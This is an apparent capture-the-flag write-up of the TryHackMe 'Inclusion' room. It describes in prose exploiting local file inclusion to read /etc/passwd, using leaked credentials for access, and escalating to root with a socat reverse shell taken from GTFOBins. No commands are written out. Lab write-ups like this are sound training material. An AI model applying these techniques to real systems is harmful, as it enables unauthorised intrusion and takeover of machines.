Inclusion – Try Hack Me

Hello guys. This room is rated as easy on THM, and from the name we can guess that we’ll have to exploit an LFI to get the initial access.

Let’s dive in and start with an NMap scan.

NMap Scan

Accessing the web application we notice that that is a blog. By clicking the View details button we see that the GET parameter has a ?name= parameter.

Let’s try and see if the web app is vulnerable to LFI. I started by trying to reach the /etc/passwd file, and then moved one directory up until I found it.

/etc/passwd file

We see that comment from which we can obtain the initial access.

Initial access

You can grab the user flag from the users home directory.

User flag

Time to privesc!

By doing some recon/enumeration we notice we can run socat as root. You can find the privesc method on GTFOBins page, here.

Firstly, i used socat to create a listener on my machine.

Socat listener

Then running socat as root i created the reverse shell.

Socat rev shell

Getting back to our terminal where we set up the listener we can see we got the reverse shell and we are root.

Root user

Hope you guys learned something! For me was an easy and fun room.